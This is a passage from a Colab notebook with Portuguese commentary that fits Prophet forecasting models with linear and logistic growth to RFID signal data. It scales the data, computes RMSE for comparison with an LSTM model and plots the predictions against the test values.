# + colab={"base_uri": "https://localhost:8080/"} id="GMZH4_x_ET1b" executionInfo={"status": "ok", "timestamp": 1607191038987, "user_tz": 180, "elapsed": 1111, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="f81517e0-8a7f-45f6-bc6f-2ecec4fe6d9c"
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="yFOZPSYKV7-I"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="YEMjhQ07Ek85" executionInfo={"status": "ok", "timestamp": 1607191053499, "user_tz": 180, "elapsed": 1002, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="649aa179-9777-4eef-ddd3-5ff9a65138f5"
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="Sp5Kw26WXwKs"
# Para a análise, instanciou-se um modelo Prophet e realizou o **método fit** do modelo utilizando como parâmetro o dataset de treino.<br>
# Após o método fit, gerou-se um novo dataset, chamado de **future**, com o método make_future_dataframe. Este médoto recebe como parâmetro a quantidade de unidades futuras a se gerar e qual a frequência temporal considerada.<br>
# Neste caso, utilizou-se uma quantidade igual ao tamanho do dataset de teste, para que seja possível realizar a comparação dos valores reais e previstos. Outro parâmetro utilizado foi a frequência em milissegundos.<br>
# O dataset future gerado tem o mesmo tamanho do dataset original e possui apenas a coluna ds (date stamp), com a série temporal do dataset de treino mais o número de previsões futuras.<br><br>
# Após a criação do dataset future, gerou-se o dataset de previsão (**forecast**), que é gerado a partir do método predict do modelo, passando como parâmetro o dataset future.
# + colab={"base_uri": "https://localhost:8080/"} id="G2OxQ54nFir9" executionInfo={"status": "ok", "timestamp": 1607191184035, "user_tz": 180, "elapsed": 47833, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2dc93ad2-07c4-4f13-c3be-22755c0c378e"
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
forecast = model.predict(future)
# + [markdown] id="EWgWH6PyZ2Md"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuidos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência são o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="HqTTG9BPGijQ" executionInfo={"status": "ok", "timestamp": 1607191214078, "user_tz": 180, "elapsed": 3294, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="78f02d65-9be0-444d-a0d2-ee37f0d23af2"
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + [markdown] id="oD7NxXADbt-h"
# Para poder se avaliar a métrica da raíz do erro quadrático médio, escalonou-se também o dataset de teste, utilizando o escalonador gerado com o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="UmSvIR17HH39" executionInfo={"status": "ok", "timestamp": 1607191306292, "user_tz": 180, "elapsed": 805, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="45ca8e9b-8c9f-4cc7-9ddc-6f70826913eb"
df_test_2 = df_test.copy()
df_test_2['y'] = scaler.transform(df_test[['y']])
df_test_2.head()
# + [markdown] id="3HAE8VqFcBXF"
# A métrica foi gerada a partir de um modelo treinado com valor escalonado a de 0 a 1, tornado-se possível realizar a comparação entre o resultado do modelo LSTM, pois ambos estão na mesma escala.
# + colab={"base_uri": "https://localhost:8080/"} id="kKQ7-fmNHqzd" executionInfo={"status": "ok", "timestamp": 1607191445020, "user_tz": 180, "elapsed": 982, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d18aada0-9cc7-4883-ad4d-f1ba52fc9df5"
rmse = sqrt(mean_squared_error(df_test_2.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + [markdown] id="vU4pm-OqcaQF"
# Para poder se exibir a distribuição dos valores reais com os valores previstos, geraram-se datasets adicionais, baseados nos datasets de treino, teste e previsão, com índices similares para facilitar a distribuição, além de os valores de y terem sido desescalonados, mostrando assim os valores na grandeza original.
# + id="ekHHhhul6u3e" executionInfo={"status": "ok", "timestamp": 1607191461295, "user_tz": 180, "elapsed": 985, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reseta index
df_test_show = df_test_2.copy()
df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # reseta index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + [markdown] id="vyg27H0RdCJ5"
# Pode-se observar no gráfico gerado, em azul uma distribuição dos valores de treino, em laranja os valores de teste e em verde os valores de teste previstos.<br>
# Pode-se observar que o modelo linear gerou uma previsão com aspecto horizontal, demonstrando pouco ou nenhum crescimento (positivo ou negativo) dentro da faixa observada.
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="v5SHR13C52Mi" executionInfo={"status": "ok", "timestamp": 1607191625150, "user_tz": 180, "elapsed": 1582, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="5aeffef7-c893-409f-d80d-22f71a31152f"
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="GQIrNXvdh8J7"
# #### Prophet com crescimento logístico
# + [markdown] id="NImw3uphh8D-"
# Para o segundo cenário análisado, utilizou-se o modelo de **crescimento logístico**, sendo que este modelo é utilizado quando há a mudança de tendência, de crescimento para decaimento e vice-versa e quando o crescimento é não-linear com saturação.<br>
# Este modelo precisa receber adicionalmente, além de ds (data stamp) e y (VALIDATION), os valores de **cap** (limite superior de saturação da tendência) e **floor** (limite inferior de saturação da tendência).<br>
# O dataset precisa ter um valor de cap e um de floor para cada observação registrada, podendo ser igual para toda a série ou variável para cada observação.<br>
# Estes limites devem ser aplicados, pois o modelo logístico considera que a tendência não deve seguir ao infinito, tendo assim um limite inferior e superior.<br>
# O crescimento não linear do modelo logístico se inicia com um crescimento aproximadamente exponencial, quando a saturação se inicia, o crescimento passa por uma tendência linear e no estágio de maturidade, o crescimento para.
# + [markdown] id="FPsVAoI0Lqg8"
# ##### *Prophet com crescimento logístico, RSSI max como cap e RSSI min como floor*
# + [markdown] id="_1gN2rDei6QR"
# Para o primeiro teste com modelo de crescimento logístico, utilizou-se os valores de RSSI máximo (MAX) e mínimo (MIN) registrado para cada tag de RFID lida como o valor de cap e floor.<br>
# Para o dataset criado, mantiveram-se as colunas de VALIDATION, TIMESTAMP, MIN e MAX, sendo que eles foram renomeados para y, ds, floor e cap respectivamente.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="Im8SNo49j6mi" executionInfo={"status": "ok", "timestamp": 1607191686297, "user_tz": 180, "elapsed": 995, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c3face41-9e2e-4fe0-928f-447a6e9338fd"
df_Prophet = df_original.drop(['EPC','MEAN','COUNT'], axis=1)
df_Prophet = df_Prophet.rename(columns={'VALIDATION': 'y','TIMESTAMP':'ds','MIN':'floor','MAX':'cap'})
df_Prophet.head()
# + [markdown] id="V1wWu0lcj6mn"
# Como haviam inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="mm2IfXozj6mo" executionInfo={"status": "ok", "timestamp": 1607191693294, "user_tz": 180, "elapsed": 1043, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3e6d2530-64cd-4b92-a98d-29e2a58343df"
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0])
df_Prophet
# + [markdown] id="vMKgd4uZj6mo"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="o1VCKazfj6mo" executionInfo={"status": "ok", "timestamp": 1607191702143, "user_tz": 180, "elapsed": 1096, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="190ae2c3-fe96-45b7-b86f-17e8378817e6"
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="qJz-hjxPj6mp" executionInfo={"status": "ok", "timestamp": 1607191707286, "user_tz": 180, "elapsed": 1001, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="6ce71566-cb08-4706-ca33-516560be958b"
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="Wc97J6GPk8Jw"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100.
# + colab={"base_uri": "https://localhost:8080/"} id="FtfpERpwL6Kg" executionInfo={"status": "ok", "timestamp": 1607191716296, "user_tz": 180, "elapsed": 993, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ea876beb-3a7b-4778-f396-bc19557938a5"
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="dg_3VtDemh48"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="aPwrG9ogL6Kg" executionInfo={"status": "ok", "timestamp": 1607191721327, "user_tz": 180, "elapsed": 1004, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d998f59e-248e-476b-fd93-db8aec7139fb"
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="EdDx5BQBlpBG"
# Para manter-se a proporcionalidade dos valores, os valores de cap e floor foram escalonados com o escalonador treinado com os valores de VALIDATION do dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="nIhACOKrMvVg" executionInfo={"status": "ok", "timestamp": 1607191727722, "user_tz": 180, "elapsed": 1014, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4a222844-f807-43c5-aaa2-4cdeae900bb3"
df_train['cap'] = scaler.transform(df_train[['cap']])
df_train['floor'] = scaler.transform(df_train[['floor']])
df_train.head()
# + [markdown] id="ByLsjppSkzNf"
# Utilizou-se um valor fixo para cap e floor, sendo que como valor, selecionou-se o maior valor de MAX e o menor valor de MIN.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="zkGrH7I5M83l" executionInfo={"status": "ok", "timestamp": 1607191763883, "user_tz": 180, "elapsed": 986, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="0a154b1d-1679-4bf6-d926-7610f48adfe5"
df_train['cap'] = df_train['cap'].max()
df_train['floor'] = df_train['floor'].min()
df_train.head()
# + [markdown] id="b2IApyQ5l5xL"
# Na criação do dataset **future**, gerou-se os periodos de tempo futuro conforme o tamanho do dataset de teste e adicionaram-se também as colunas de cap e floor, utilizando-se os mesmos valores adotados como cap e floor fixos para o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 470} id="du8y4W0yL6Kg" executionInfo={"status": "ok", "timestamp": 1607191802960, "user_tz": 180, "elapsed": 31446, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="fd66dcee-6ad6-488b-f235-99738ef15e34"
model = Prophet(growth='logistic')
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
future['cap'] = df_train['cap'].max()
future['floor'] = df_train['floor'].min()
future
# + [markdown] id="Wn-rabMcmb3R"
# O dataset de previsão (forecast) foi então gerado a partir do método predict do modelo treinado com crescimento logístico.
# + id="nmDBGsptNM3n" executionInfo={"status": "ok", "timestamp": 1607191827355, "user_tz": 180, "elapsed": 21212, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
forecast = model.predict(future)
# + [markdown] id="Mb-h3u7kmvVA"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuidos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência são o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="uE9_BgYPL6Kg" executionInfo={"status": "ok", "timestamp": 1607191834976, "user_tz": 180, "elapsed": 3232, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2b604888-cf06-4806-e499-c920db47e2d7"
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="Z3DOztV9L6Kg" executionInfo={"status": "ok", "timestamp": 1607191846509, "user_tz": 180, "elapsed": 981, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2fd79788-e039-45b2-f49d-9295ed9f359d"
df_test['y'] = scaler.transform(df_test[['y']])
df_test.head()
# + colab={"base_uri": "https://localhost:8080/"} id="wIFDshcTL6Kh" executionInfo={"status": "ok", "timestamp": 1607191887565, "user_tz": 180, "elapsed": 968, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4b14fd0d-b8b1-4ed1-f80e-0360e5edfc36"
rmse = sqrt(mean_squared_error(df_test.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + id="4NWO5f7qAjPQ" executionInfo={"status": "ok", "timestamp": 1607191893998, "user_tz": 180, "elapsed": 964, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reseta index
df_test_show = df_test.copy()
df_test_show.index = pd.RangeIndex(df_train.shape[0],df_train.shape[0]+df_test.shape[0]) # reseta index
df_train_show['y'] = scaler.inverse_transform(df_train_show[['y']])
df_test_show['y'] = scaler.inverse_transform(df_test_show[['y']])
forecast_show = forecast.copy()
forecast_show['yhat'] = scaler.inverse_transform(forecast_show[['yhat']])
# + [markdown] id="ygxSCiKqk2xF"
# Por fim, comparou-se o a distribuição dos dados dos valores reais e previstos da série.
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="ski9GcKoAjPR" executionInfo={"status": "ok", "timestamp": 1607191959498, "user_tz": 180, "elapsed": 1608, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b8e3ec83-9f59-4f4d-fa07-42d17c2b77f9"
plt.figure(figsize=(25,10))
plt.plot(df_train_show.iloc[35447:,1])
plt.plot(df_test_show.iloc[:200,1])
plt.plot(forecast_show.iloc[df_test_show.index[0]:df_test_show.index[0]+200,-1])
plt.legend(['Train','Test','Prediction'])
plt.show()
# + [markdown] id="vtL4kpfdCz4h"
# ##### *Prophet com crescimento logístico, VALIDATION max como cap e VALIDATION min como floor*
# + [markdown] id="Ce4fid0gbzet"
# Para o segundo teste com modelo de crescimento logístico, utilizaram-se os valores de máximo e mínimo de VALIDATION para cap e floor registrado para cada tag de RFID.<br>
# Para o dataset criado, mantiveram-se as colunas de VALIDATION, TIMESTAMP, MIN e MAX, sendo que eles foram renomeados para y, ds, floor e cap respectivamente.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="11BDwyqMCz4h" executionInfo={"status": "ok", "timestamp": 1607191979647, "user_tz": 180, "elapsed": 1032, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="33ee0b38-6e6f-4cfe-980d-88bce53af62d"
df_Prophet = df_original.drop(['EPC','MEAN','COUNT'], axis=1)
df_Prophet = df_Prophet.rename(columns={'VALIDATION': 'y','TIMESTAMP':'ds','MIN':'floor','MAX':'cap'})
df_Prophet.head()
# + [markdown] id="4le01kz4Cz4j"
# Como haviam inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="O861R9GRCz4j" executionInfo={"status": "ok", "timestamp": 1607191983469, "user_tz": 180, "elapsed": 986, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2223ee7c-c2cc-42a3-b29e-943f2db72531"
df_Prophet.index = pd.RangeIndex(0,df_Prophet.shape[0])
df_Prophet
# + [markdown] id="LSHjiEWXCz4k"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="vUFs0_EbCz4k" executionInfo={"status": "ok", "timestamp": 1607191987383, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3b927cc3-daa6-428e-ab41-aa8e4bfa5f7c"
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="Tr5rGv6kCz4k" executionInfo={"status": "ok", "timestamp": 1607191989476, "user_tz": 180, "elapsed": 994, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8a990870-9eae-4737-b40e-1b9a1b2ae96a"
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="w-C_4N7pm0pp"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100.
# + colab={"base_uri": "https://localhost:8080/"} id="jgnbCmXaCz4k" executionInfo={"status": "ok", "timestamp": 1607191994674, "user_tz": 180, "elapsed": 1019, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="37f2ff3e-e227-491f-e3e6-849099193e4c"
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
print (df_train.shape, df_test.shape)
train_size = df_train.shape[0]
test_size = df_test.shape[0]
# + [markdown] id="0sOauQMsm3Ik"
# Para os valores de cap e floor, utilizaram-se os valores máximo e mínimo de y(t) do dataset de treino.
# + id="WoQXQamFEcg-" executionInfo={"status": "ok", "timestamp": 1607191999529, "user_tz": 180, "elapsed": 969, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_train['cap'] = df_train['y'].max()
df_train['floor'] = df_train['y'].min()
# + [markdown] id="0RUPsGnPnD-f"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="WcbDWQBuCz4l" executionInfo={"status": "ok", "timestamp": 1607192003298, "user_tz": 180, "elapsed": 1010, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="5ea9e36d-e17e-4b94-c42a-4ffce0805d28"
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="S5qoAOvMnLZu"
# Para manter-se a proporcionalidade dos valores, os valores de cap e floor foram escalonados com o escalonador treinado com os valores de VALIDATION do dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="hbAGMUI-Cz4l" executionInfo={"status": "ok", "timestamp": 1607192007394, "user_tz": 180, "elapsed": 991, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="06e30f48-134e-44c2-f393-54fedaaa0abe"
df_train['cap'] = scaler.transform(df_train[['cap']])
df_train['floor'] = scaler.transform(df_train[['floor']])
df_train.head()
# + [markdown] id="PqegEXkTj7JM"
# Utilizaram-se os valores máximo e mínimo de VALIDATION para cap e floor do dataset future.
# + colab={"base_uri": "https://localhost:8080/", "height": 470} id="oc4ibOqwCz4m" executionInfo={"status": "ok", "timestamp": 1607192043046, "user_tz": 180, "elapsed": 20421, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="5fb83412-4c9c-4545-fa9a-618240c847b9"
model = Prophet(growth='logistic')
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
future['cap'] = df_train['cap'].max()
future['floor'] = df_train['floor'].min()
future
# + id="5OwFkEbdCz4m" executionInfo={"status": "ok", "timestamp": 1607192068408, "user_tz": 180, "elapsed": 22258, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
forecast = model.predict(future)
# + [markdown] id="sUesMB8GkKtO"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuidos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência são o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="wtNGuhSgCz4m" executionInfo={"status": "ok", "timestamp": 1607192070719, "user_tz": 180, "elapsed": 19054, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="bc183eb8-a2ff-451c-8eec-0de80afdf0fe"
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + [markdown] id="iXPZeqYQnOwO"
# Para poder se avaliar a métrica da raíz do erro quadrático médio, escalonou-se também o dataset de teste, utilizando o escalonador gerado com o dataset de treino.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="XC-YnBtICz4m" executionInfo={"status": "ok", "timestamp": 1607192081108, "user_tz": 180, "elapsed": 806, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9811c765-72c5-44e6-a8e2-1deb318761df"
df_test['y'] = scaler.transform(df_test[['y']])
df_test.head()
# + [markdown] id="E-O9QuRvkN1z"
# Com base nos valores previstos e os valores reais, calculou-se o valor de RMSE (Raíz do Erro Quadrático Médio).
# + colab={"base_uri": "https://localhost:8080/"} id="mAebJKAmCz4m" executionInfo={"status": "ok", "timestamp": 1607192104268, "user_tz": 180, "elapsed": 1016, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="76423e59-66e5-437d-adf1-79d8088792dc"
rmse = sqrt(mean_squared_error(df_test.iloc[:,1], forecast.iloc[-df_test.shape[0]:,-1]))
print('RMSE: %f' % rmse)
# + id="8SWqUkpLCz4n" executionInfo={"status": "ok", "timestamp": 1607192119746, "user_tz": 180, "elapsed": 987, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_train_show = df_train.copy()
df_train_show.index = pd.RangeIndex(0,df_train.shape[0]) # reseta index
df_test_show = df_test.copy()
